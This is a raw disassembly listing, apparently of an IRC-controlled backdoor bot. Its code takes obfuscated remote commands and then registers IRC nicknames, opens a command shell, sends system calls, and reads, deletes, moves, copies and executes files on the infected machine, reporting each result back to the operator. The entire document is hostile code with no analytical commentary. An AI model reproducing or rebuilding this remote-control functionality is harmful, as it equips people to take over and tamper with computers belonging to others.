; sub_40A9FE+44E0�j
push dword ptr [ebx+4]
push offset a1shta0bzfwk1 ; "1ShtA0bzFwk1"
call edi ; dword_437178
test eax, eax
jnz short loc_40EFD9
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
pop ecx
call sub_401A77
push eax
call sub_401A77
push eax
lea eax, [ebp+var_5F150]
push offset aS@S_com ; "%s@%s.com"
push eax
call sub_429B03
lea eax, [ebp+var_5F150]
push eax
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
lea eax, [ebp+var_59BC]
push offset aSNickservRegis ; "%s nickserv :register pass103 %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 24h
loc_40EFD9: ; CODE XREF: sub_40A9FE+4583�j
push dword ptr [ebx+4]
push offset aAzcsp_hkilo_ ; "AZcsP.hkiLO."
call edi ; dword_437178
test eax, eax
jnz short loc_40F00C
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
lea eax, [ebp+var_59BC]
push offset aSNickservDrop ; "%s nickserv drop"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 10h
loc_40F00C: ; CODE XREF: sub_40A9FE+45E7�j
push dword ptr [ebx+4]
push offset aErwc30qfw_p0 ; "eRWc30Qfw.P0"
call edi ; dword_437178
test eax, eax
jnz loc_414995
call sub_426B6C
xor ebx, ebx
mov edi, offset aSUnloaded_ ; "%s Unloaded."
cmp [ebp+arg_14], ebx
jnz short loc_40F048
cmp [ebp+arg_18], ebx
jnz short loc_40F051
push offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_40F048: ; CODE XREF: sub_40A9FE+462F�j
cmp [ebp+arg_18], ebx
jz loc_414995
loc_40F051: ; CODE XREF: sub_40A9FE+4634�j
push offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
jmp loc_414743
; ---------------------------------------------------------------------------
loc_40F05B: ; CODE XREF: sub_40A9FE+2A19�j
push dword ptr [ebx]
push offset aFepmfZswfd ; "FEpMF/ZswFD/"
call edi ; dword_437178
test eax, eax
jnz loc_40F101
cmp [ebx+4], eax
jnz short loc_40F07B
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jmp loc_40F8A0
; ---------------------------------------------------------------------------
loc_40F07B: ; CODE XREF: sub_40A9FE+4671�j
push 20h
push [ebp+arg_8]
call sub_42B1A0
mov edi, eax
xor ebx, ebx
pop ecx
cmp edi, ebx
pop ecx
jz loc_414995
cmp [ebp+arg_34], ebx
jz short loc_40F0C9
mov al, [ebp+arg_38]
mov byte ptr [ebp+arg_C+3], 5Fh
test al, al
jz short loc_40F0A6
mov byte ptr [ebp+arg_C+3], al
loc_40F0A6: ; CODE XREF: sub_40A9FE+46A3�j
push edi
call sub_4293A0
test eax, eax
pop ecx
jbe short loc_40F0C9
loc_40F0B1: ; CODE XREF: sub_40A9FE+46C9�j
mov al, byte ptr [ebp+arg_C+3]
cmp [ebx+edi], al
jnz short loc_40F0BD
mov byte ptr [ebx+edi], 20h
loc_40F0BD: ; CODE XREF: sub_40A9FE+46B9�j
push edi
inc ebx
call sub_4293A0
cmp ebx, eax
pop ecx
jb short loc_40F0B1
loc_40F0C9: ; CODE XREF: sub_40A9FE+4698�j
; sub_40A9FE+46B1�j
inc edi
push edi
call sub_42B0E9
test eax, eax
pop ecx
jz short loc_40F0F1
cmp [ebp+arg_18], 0
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSSystemcallFai ; "%s SystemCall failed."
jnz loc_414744
loc_40F0E9: ; CODE XREF: sub_40A9FE+C33�j
push dword ptr [esi+0Ch]
jmp loc_40AF51
; ---------------------------------------------------------------------------
loc_40F0F1: ; CODE XREF: sub_40A9FE+46D5�j
push edi
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSSystemcallSen ; "%s SystemCall sent: \"%s\""
jmp loc_40D1F8
; ---------------------------------------------------------------------------
loc_40F101: ; CODE XREF: sub_40A9FE+4668�j
push dword ptr [ebx]
push offset aSud8hRsu8j1 ; "sUd8h/rsu8j1"
call edi ; dword_437178
test eax, eax
jnz loc_40F1EE
mov eax, [ebp+arg_14]
mov ecx, [ebp+arg_18]
mov [ebp+var_27D4], eax
mov eax, [ebp+arg_10]
mov [ebp+var_27D8], ecx
mov [ebp+var_28E4], eax
mov eax, [eax]
mov [ebp+var_28E0], eax
lea eax, [ebp+var_285C]
test ecx, ecx
jnz short loc_40F144
push dword ptr [esi+0Ch]
jmp short loc_40F146
; ---------------------------------------------------------------------------
loc_40F144: ; CODE XREF: sub_40A9FE+473F�j
push dword ptr [esi]
loc_40F146: ; CODE XREF: sub_40A9FE+4744�j
push eax
call dword_4370B4 ; lstrcpyA
push 0Fh
call sub_423800
test eax, eax
pop ecx
jle short loc_40F168
mov ebx, offset aSS_ ; "%s %s."
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
jmp loc_40F2F6
; ---------------------------------------------------------------------------
loc_40F168: ; CODE XREF: sub_40A9FE+4759�j
push [ebp+var_28E4]
lea eax, [ebp+var_285C]
push eax
call sub_41E7BE
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov edi, offset aWhdag1glagf_ ; "WHdAg1glAgf."
mov ebx, offset aSCouldnTOpenSh ; "%s Couldn't open shell."
jnz short loc_40F1A7
cmp [ebp+arg_14], 0
jnz short loc_40F1A7
cmp [ebp+arg_18], 0
jnz short loc_40F1AD
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_40F1A7: ; CODE XREF: sub_40A9FE+478B�j
; sub_40A9FE+4791�j
cmp [ebp+arg_18], 0
jz short loc_40F1BB
loc_40F1AD: ; CODE XREF: sub_40A9FE+4797�j
push edi
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
jmp short loc_40F1D6
; ---------------------------------------------------------------------------
loc_40F1BB: ; CODE XREF: sub_40A9FE+47AD�j
cmp [ebp+arg_14], 0
jnz loc_414995
push edi
push offset aSShellReady_ ; "%s Shell ready."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
loc_40F1D6: ; CODE XREF: sub_40A9FE+47BB�j
add esp, 10h
cmp [ebp+arg_18], 0
jz loc_414995
push edi
push offset aSShellReady_ ; "%s Shell ready."
jmp loc_414744
; ---------------------------------------------------------------------------
loc_40F1EE: ; CODE XREF: sub_40A9FE+470E�j
push dword ptr [ebx]
push offset aJ2yyw_j09xc ; "j2yYw.J09XC/"
call edi ; dword_437178
test eax, eax
jnz loc_40F370
cmp [ebx+4], eax
jnz short loc_40F242
cmp [ebp+arg_14], eax
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_40F22D
cmp [ebp+arg_18], eax
jnz short loc_40F237
push ebx
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40F22D: ; CODE XREF: sub_40A9FE+4813�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40F237: ; CODE XREF: sub_40A9FE+4818�j
push ebx
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
jmp loc_40C891
; ---------------------------------------------------------------------------
loc_40F242: ; CODE XREF: sub_40A9FE+4804�j
push 2710h
lea eax, [ebp+var_3A760]
push 0
push eax
call sub_429760
mov edi, 104h
lea eax, [ebp+var_2A7C]
push edi
push 0
push eax
call sub_429760
push dword ptr [ebx+4]
lea eax, [ebp+var_2A7C]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 24h
push 2
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_40F2C9
loc_40F28B: ; CODE XREF: sub_40A9FE+48C9�j
mov eax, [ebp+arg_C]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40F2BE
push eax
lea eax, [ebp+var_3A760]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_3A760]
push edi
push eax
lea eax, [ebp+var_2A7C]
push eax
call sub_4299E0
add esp, 18h
loc_40F2BE: ; CODE XREF: sub_40A9FE+4895�j
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_4]
jl short loc_40F28B
loc_40F2C9: ; CODE XREF: sub_40A9FE+488B�j
lea eax, [ebp+var_2A7C]
push offset asc_440D90 ; "\n"
push eax
call dword_437090 ; lstrcatA
lea eax, [ebp+var_2A7C]
push eax
call sub_41E5C7
test eax, eax
pop ecx
jnz short loc_40F32C
mov ebx, offset aSS_1 ; "%s %s"
mov edi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
loc_40F2F6: ; CODE XREF: sub_40A9FE+4765�j
cmp [ebp+arg_14], 0
jnz short loc_40F317
cmp [ebp+arg_18], 0
jnz short loc_40F321
push edi
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40F317: ; CODE XREF: sub_40A9FE+48FC�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40F321: ; CODE XREF: sub_40A9FE+4902�j
push edi
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
jmp loc_40B0FB
; ---------------------------------------------------------------------------
loc_40F32C: ; CODE XREF: sub_40A9FE+48EC�j
cmp [ebp+arg_14], 0
mov ebx, offset aWhdag1glagf_ ; "WHdAg1glAgf."
mov edi, offset aSCommandsS_ ; "%s Commands: %s."
jnz short loc_40F359
cmp [ebp+arg_18], 0
jnz short loc_40F363
lea eax, [ebp+var_2A7C]
push eax
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40F359: ; CODE XREF: sub_40A9FE+493C�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40F363: ; CODE XREF: sub_40A9FE+4942�j
lea eax, [ebp+var_2A7C]
push eax
push ebx
jmp loc_40C891
; ---------------------------------------------------------------------------
loc_40F370: ; CODE XREF: sub_40A9FE+47FB�j
push dword ptr [ebx]
push offset a43ucs0rkqux_ ; "43uCS0rkQUx."
call edi ; dword_437178
test eax, eax
jnz short loc_40F389
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
push 0Fh
jmp loc_412B29
; ---------------------------------------------------------------------------
loc_40F389: ; CODE XREF: sub_40A9FE+497D�j
push dword ptr [ebx]
push offset aJc8j0_blhir0 ; "jC8j0.blHIr0"
call edi ; dword_437178
test eax, eax
jnz loc_40FB9F
xor ecx, ecx
cmp [ebx+4], ecx
jz loc_40FB84
mov eax, [ebx+8]
cmp eax, ecx
jz loc_40FB84
push eax
lea eax, [ebp+var_418]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 0Ch
push 3
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_40F412
loc_40F3D0: ; CODE XREF: sub_40A9FE+4A12�j
mov eax, [ebp+arg_C]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40F407
push eax
lea eax, [ebp+var_63F70]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_63F70]
push 104h
push eax
lea eax, [ebp+var_418]
push eax
call sub_4299E0
add esp, 18h
loc_40F407: ; CODE XREF: sub_40A9FE+49DA�j
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_4]
jl short loc_40F3D0
loc_40F412: ; CODE XREF: sub_40A9FE+49D0�j
push dword ptr [ebx+4]
push offset aPiygc_bgpyh_ ; "PIYGC.BgPyH."
call edi ; dword_437178
test eax, eax
jnz loc_40F5D6
push dword ptr [ebx+8]
lea eax, [ebp+var_2470]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 0Ch
push 3
pop edi
cmp [ebp+arg_4], edi
jle short loc_40F478
loc_40F443: ; CODE XREF: sub_40A9FE+4A78�j
mov eax, [ebx+edi*4]
test eax, eax
jz short loc_40F472
push eax
lea eax, [ebp+var_68D90]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_68D90]
push eax
lea eax, [ebp+var_2470]
push eax
call sub_42A5E0
add esp, 14h
loc_40F472: ; CODE XREF: sub_40A9FE+4A4A�j
inc edi
cmp edi, [ebp+arg_4]
jl short loc_40F443
loc_40F478: ; CODE XREF: sub_40A9FE+4A43�j
lea eax, [ebp+var_2470]
push offset word_43EF70
push eax
call sub_42A50C
pop ecx
mov [ebp+arg_C], eax
test eax, eax
pop ecx
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jz loc_40F587
cmp [ebp+arg_14], 0
mov ebx, offset aSDisplayingFil ; "%s Displaying file: %s"
jnz short loc_40F4C3
cmp [ebp+arg_18], 0
jnz short loc_40F4C9
lea eax, [ebp+var_2470]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40F4C3: ; CODE XREF: sub_40A9FE+4AA6�j
cmp [ebp+arg_18], 0
jz short loc_40F4DF
loc_40F4C9: ; CODE XREF: sub_40A9FE+4AAC�j
lea eax, [ebp+var_2470]
push eax
push edi
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 14h
loc_40F4DF: ; CODE XREF: sub_40A9FE+4AC9�j
mov ebx, 2710h
jmp short loc_40F50C
; ---------------------------------------------------------------------------
loc_40F4E6: ; CODE XREF: sub_40A9FE+4B23�j
cmp [ebp+arg_14], 0
jnz short loc_40F50C
cmp [ebp+arg_18], 0
jnz short loc_40F50C
lea eax, [ebp+var_491C0]
push eax
push offset aS_5 ; "%s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_40F50C: ; CODE XREF: sub_40A9FE+4AE6�j
; sub_40A9FE+4AEC�j ...
push [ebp+arg_C]
lea eax, [ebp+var_491C0]
push ebx
push eax
call sub_42B087
add esp, 0Ch
test eax, eax
jnz short loc_40F4E6
cmp [ebp+arg_18], eax
jz short loc_40F541
lea eax, [ebp+var_491C0]
push eax
push offset aS_5 ; "%s"
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 10h
loc_40F541: ; CODE XREF: sub_40A9FE+4B28�j
push [ebp+arg_C]
call sub_42A10B
cmp [ebp+arg_14], 0
pop ecx
mov ebx, offset aSFileDisplayed ; "%s File displayed: %s"
jnz short loc_40F572
cmp [ebp+arg_18], 0
jnz short loc_40F57C
lea eax, [ebp+var_2470]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40F572: ; CODE XREF: sub_40A9FE+4B55�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40F57C: ; CODE XREF: sub_40A9FE+4B5B�j
lea eax, [ebp+var_2470]
jmp loc_40B0F9
; ---------------------------------------------------------------------------
loc_40F587: ; CODE XREF: sub_40A9FE+4A97�j
cmp [ebp+arg_14], 0
mov ebx, dword_437170
jnz short loc_40F5B7
cmp [ebp+arg_18], 0
jnz short loc_40F5C1
call ebx ; dword_437170
push eax
lea eax, [ebp+var_2470]
push eax
push edi
push offset aSFailedToReadF ; "%s Failed to read file: %s,error: <%d>"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40F5B7: ; CODE XREF: sub_40A9FE+4B93�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40F5C1: ; CODE XREF: sub_40A9FE+4B99�j
call ebx ; dword_437170
push eax
lea eax, [ebp+var_2470]
push eax
push edi
push offset aSFailedToReadF ; "%s Failed to read file: %s,error: <%d>"
jmp loc_41491D
; ---------------------------------------------------------------------------
loc_40F5D6: ; CODE XREF: sub_40A9FE+4A20�j
push dword ptr [ebx+4]
push offset a7bqzu_aqz2u_ ; "7bQzU.aQz2u."
call edi ; dword_437178
test eax, eax
jnz short loc_40F61A
lea eax, [ebp+var_418]
push eax
call sub_4277C0
test eax, eax
pop ecx
jz short loc_40F60B
lea eax, [ebp+var_418]
push eax
push offset aLmecq0ygcok ; "lmecq0yGcoK/"
push offset aSFileExistsS ; "%s File exists: %s"
jmp loc_40D1F8
; ---------------------------------------------------------------------------
loc_40F60B: ; CODE XREF: sub_40A9FE+4BF5�j
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
mov ebx, offset aSFileDoesnTExi ; "%s File doesn't exist: %s"
jmp loc_40FAFD
; ---------------------------------------------------------------------------
loc_40F61A: ; CODE XREF: sub_40A9FE+4BE4�j
push dword ptr [ebx+4]
push offset aSar5v0jloic0 ; "saR5v0JloIc0"
call edi ; dword_437178
test eax, eax
jnz short loc_40F697
lea eax, [ebp+var_418]
push eax
call dword_437060 ; DeleteFileA
test eax, eax
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jz short loc_40F648
mov ebx, offset aSFileDeletedS ; "%s File deleted: %s"
jmp loc_40FAFD
; ---------------------------------------------------------------------------
loc_40F648: ; CODE XREF: sub_40A9FE+4C3E�j
cmp [ebp+arg_14], 0
mov ebx, dword_437170
jnz short loc_40F678
cmp [ebp+arg_18], 0
jnz short loc_40F682
call ebx ; dword_437170
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToDelFi ; "%s Failed to del file: %s, error: <%d>"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40F678: ; CODE XREF: sub_40A9FE+4C54�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40F682: ; CODE XREF: sub_40A9FE+4C5A�j
call ebx ; dword_437170
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToDelFi ; "%s Failed to del file: %s, error: <%d>"
jmp loc_41491D
; ---------------------------------------------------------------------------
loc_40F697: ; CODE XREF: sub_40A9FE+4C28�j
push dword ptr [ebx+4]
push offset aX43mxEgedu_ ; "x43Mx/eGeDu."
call edi ; dword_437178
test eax, eax
jnz short loc_40F714
lea eax, [ebp+var_418]
push eax
call sub_4277C0
test eax, eax
pop ecx
jz short loc_40F705
lea eax, [ebp+var_418]
push eax
call sub_4277D5
test eax, eax
pop ecx
jz short loc_40F6FE
lea eax, [ebp+var_418]
push eax
call sub_42810F
lea eax, [ebp+var_418]
push eax
call sub_4277C0
pop ecx
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
test eax, eax
pop ecx
jnz short loc_40F6F4
mov ebx, offset aSFolderDeleted ; "%s Folder deleted: %s"
jmp loc_40FAFD
; ---------------------------------------------------------------------------
loc_40F6F4: ; CODE XREF: sub_40A9FE+4CEA�j
mov ebx, offset aSFailedToDelet ; "%s Failed to delete folder: %s"
jmp loc_40FAFD
; ---------------------------------------------------------------------------
loc_40F6FE: ; CODE XREF: sub_40A9FE+4CC7�j
mov ebx, offset aSSIsNotAFolder ; "%s %s is not a folder."
jmp short loc_40F70A
; ---------------------------------------------------------------------------
loc_40F705: ; CODE XREF: sub_40A9FE+4CB6�j
mov ebx, offset aSSDoesnTExist_ ; "%s %s doesn't exist."
loc_40F70A: ; CODE XREF: sub_40A9FE+4D05�j
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jmp loc_40FAFD
; ---------------------------------------------------------------------------
loc_40F714: ; CODE XREF: sub_40A9FE+4CA5�j
push dword ptr [ebx+4]
push offset aIsopf_pu4ty0 ; "IsoPF.PU4tY0"
call edi ; dword_437178
test eax, eax
jnz loc_40F884
cmp [ebx+0Ch], eax
jz loc_40F89B
push dword ptr [ebx+8]
lea eax, [ebp+var_418]
push eax
call sub_429B03
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_236C]
push eax
call sub_429B03
xor edi, edi
add esp, 10h
cmp [ebp+arg_34], edi
jz short loc_40F7C6
cmp [ebp+arg_38], 0
mov bl, 5Fh
jz short loc_40F762
mov bl, [ebp+arg_38]
loc_40F762: ; CODE XREF: sub_40A9FE+4D5F�j
lea eax, [ebp+var_418]
push eax
call sub_4293A0
test eax, eax
pop ecx
jbe short loc_40F793
loc_40F773: ; CODE XREF: sub_40A9FE+4D93�j
lea eax, [ebp+edi+var_418]
cmp [eax], bl
jnz short loc_40F781
mov byte ptr [eax], 20h
loc_40F781: ; CODE XREF: sub_40A9FE+4D7E�j
lea eax, [ebp+var_418]
inc edi
push eax
call sub_4293A0
cmp edi, eax
pop ecx
jb short loc_40F773
loc_40F793: ; CODE XREF: sub_40A9FE+4D73�j
lea eax, [ebp+var_236C]
xor edi, edi
push eax
call sub_4293A0
test eax, eax
pop ecx
jbe short loc_40F7C6
loc_40F7A6: ; CODE XREF: sub_40A9FE+4DC6�j
lea eax, [ebp+edi+var_236C]
cmp [eax], bl
jnz short loc_40F7B4
mov byte ptr [eax], 20h
loc_40F7B4: ; CODE XREF: sub_40A9FE+4DB1�j
lea eax, [ebp+var_236C]
inc edi
push eax
call sub_4293A0
cmp edi, eax
pop ecx
jb short loc_40F7A6
loc_40F7C6: ; CODE XREF: sub_40A9FE+4D57�j
; sub_40A9FE+4DA6�j
lea eax, [ebp+var_236C]
push eax
lea eax, [ebp+var_418]
push eax
call dword_4370C4 ; MoveFileA
test eax, eax
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jz short loc_40F827
cmp [ebp+arg_14], 0
mov ebx, offset aSMovedSToS ; "%s Moved: \"%s\" to: \"%s\""
jnz short loc_40F812
cmp [ebp+arg_18], 0
jnz short loc_40F81C
lea eax, [ebp+var_236C]
push eax
lea eax, [ebp+var_418]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40F812: ; CODE XREF: sub_40A9FE+4DEE�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40F81C: ; CODE XREF: sub_40A9FE+4DF4�j
lea eax, [ebp+var_236C]
jmp loc_40F9B2
; ---------------------------------------------------------------------------
loc_40F827: ; CODE XREF: sub_40A9FE+4DE3�j
cmp [ebp+arg_14], 0
mov ebx, dword_437170
jnz short loc_40F85E
cmp [ebp+arg_18], 0
jnz short loc_40F868
call ebx ; dword_437170
push eax
lea eax, [ebp+var_236C]
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToMoveS ; "%s Failed to move: \"%s\" to: \"%s\", error"...
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_40F85E: ; CODE XREF: sub_40A9FE+4E33�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40F868: ; CODE XREF: sub_40A9FE+4E39�j
call ebx ; dword_437170
push eax
lea eax, [ebp+var_236C]
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToMoveS ; "%s Failed to move: \"%s\" to: \"%s\", error"...
jmp loc_414988
; ---------------------------------------------------------------------------
loc_40F884: ; CODE XREF: sub_40A9FE+4D22�j
push dword ptr [ebx+4]
push offset a98mu_Nedn7_ ; "98mu./nEdn7."
call edi ; dword_437178
test eax, eax
jnz loc_40FA1C
cmp [ebx+0Ch], eax
jnz short loc_40F8B6
loc_40F89B: ; CODE XREF: sub_40A9FE+4D2B�j
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
loc_40F8A0: ; CODE XREF: sub_40A9FE+4678�j
cmp [ebp+arg_14], eax
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz loc_40D2BD
cmp [ebp+arg_18], eax
jmp loc_40D2AB
; ---------------------------------------------------------------------------
loc_40F8B6: ; CODE XREF: sub_40A9FE+4E9B�j
push dword ptr [ebx+8]
lea eax, [ebp+var_418]
push eax
call sub_429B03
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_2574]
push eax
call sub_429B03
xor edi, edi
add esp, 10h
cmp [ebp+arg_34], edi
jz short loc_40F94D
cmp [ebp+arg_38], 0
mov bl, 5Fh
jz short loc_40F8E9
mov bl, [ebp+arg_38]
loc_40F8E9: ; CODE XREF: sub_40A9FE+4EE6�j
lea eax, [ebp+var_418]
push eax
call sub_4293A0
test eax, eax
pop ecx
jbe short loc_40F91A
loc_40F8FA: ; CODE XREF: sub_40A9FE+4F1A�j
lea eax, [ebp+edi+var_418]
cmp [eax], bl
jnz short loc_40F908
mov byte ptr [eax], 20h
loc_40F908: ; CODE XREF: sub_40A9FE+4F05�j
lea eax, [ebp+var_418]
inc edi
push eax
call sub_4293A0
cmp edi, eax
pop ecx
jb short loc_40F8FA
loc_40F91A: ; CODE XREF: sub_40A9FE+4EFA�j
lea eax, [ebp+var_2574]
xor edi, edi
push eax
call sub_4293A0
test eax, eax
pop ecx
jbe short loc_40F94D
loc_40F92D: ; CODE XREF: sub_40A9FE+4F4D�j
lea eax, [ebp+edi+var_2574]
cmp [eax], bl
jnz short loc_40F93B
mov byte ptr [eax], 20h
loc_40F93B: ; CODE XREF: sub_40A9FE+4F38�j
lea eax, [ebp+var_2574]
inc edi
push eax
call sub_4293A0
cmp edi, eax
pop ecx
jb short loc_40F92D
loc_40F94D: ; CODE XREF: sub_40A9FE+4EDE�j
; sub_40A9FE+4F2D�j
xor eax, eax
cmp [ebp+arg_40], eax
setz al
push eax
lea eax, [ebp+var_2574]
push eax
lea eax, [ebp+var_418]
push eax
call dword_437064 ; CopyFileA
test eax, eax
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jz short loc_40F9BF
cmp [ebp+arg_14], 0
mov ebx, offset aSCopiedSToS ; "%s Copied: \"%s\" to \"%s\""
jnz short loc_40F9A2
cmp [ebp+arg_18], 0
jnz short loc_40F9AC
lea eax, [ebp+var_2574]
push eax
lea eax, [ebp+var_418]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40F9A2: ; CODE XREF: sub_40A9FE+4F7E�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40F9AC: ; CODE XREF: sub_40A9FE+4F84�j
lea eax, [ebp+var_2574]
loc_40F9B2: ; CODE XREF: sub_40A9FE+4E24�j
push eax
lea eax, [ebp+var_418]
push eax
jmp loc_40B6FD
; ---------------------------------------------------------------------------
loc_40F9BF: ; CODE XREF: sub_40A9FE+4F73�j
cmp [ebp+arg_14], 0
mov ebx, dword_437170
jnz short loc_40F9F6
cmp [ebp+arg_18], 0
jnz short loc_40FA00
call ebx ; dword_437170
push eax
lea eax, [ebp+var_2574]
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToCopyS ; "%s Failed to copy: \"%s\" to \"%s\",error: "...
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_40F9F6: ; CODE XREF: sub_40A9FE+4FCB�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40FA00: ; CODE XREF: sub_40A9FE+4FD1�j
call ebx ; dword_437170
push eax
lea eax, [ebp+var_2574]
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToCopyS ; "%s Failed to copy: \"%s\" to \"%s\",error: "...
jmp loc_414988
; ---------------------------------------------------------------------------
loc_40FA1C: ; CODE XREF: sub_40A9FE+4E92�j
push dword ptr [ebx+4]
push offset aVdirq_mjcpx1 ; "vDIrQ.MJcpx1"
call edi ; dword_437178
test eax, eax
jnz loc_40FAC7
cmp [ebp+arg_44], eax
jz short loc_40FA37
or [ebp+arg_C], 4
loc_40FA37: ; CODE XREF: sub_40A9FE+5033�j
cmp [ebp+arg_48], eax
jz short loc_40FA40
or [ebp+arg_C], 2
loc_40FA40: ; CODE XREF: sub_40A9FE+503C�j
cmp [ebp+arg_4C], eax
jz short loc_40FA49
or [ebp+arg_C], 1
loc_40FA49: ; CODE XREF: sub_40A9FE+5045�j
cmp [ebp+arg_50], eax
jz short loc_40FA55
mov [ebp+arg_C], 80h
loc_40FA55: ; CODE XREF: sub_40A9FE+504E�j
push [ebp+arg_C]
lea eax, [ebp+var_418]
push eax
call dword_437068 ; SetFileAttributesA
test eax, eax
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jz short loc_40FA78
mov ebx, offset aSAttributesSet ; "%s Attributes Set to: \"%s\"."
jmp loc_40FAFD
; ---------------------------------------------------------------------------
loc_40FA78: ; CODE XREF: sub_40A9FE+506E�j
cmp [ebp+arg_14], 0
mov ebx, dword_437170
jnz short loc_40FAA8
cmp [ebp+arg_18], 0
jnz short loc_40FAB2
call ebx ; dword_437170
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToSetAt ; "%s Failed to set Attributes to: \"%s\",er"...
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40FAA8: ; CODE XREF: sub_40A9FE+5084�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40FAB2: ; CODE XREF: sub_40A9FE+508A�j
call ebx ; dword_437170
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToSetAt ; "%s Failed to set Attributes to: \"%s\",er"...
jmp loc_41491D
; ---------------------------------------------------------------------------
loc_40FAC7: ; CODE XREF: sub_40A9FE+502A�j
push dword ptr [ebx+4]
push offset aSad25HpR91 ; "Sad25/hP/R91"
call edi ; dword_437178
test eax, eax
jnz loc_414995
push eax
push eax
lea ecx, [ebp+var_418]
push eax
push ecx
push offset aOpen ; "open"
push eax
call dword_456E74 ; ShellExecuteA
test eax, eax
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
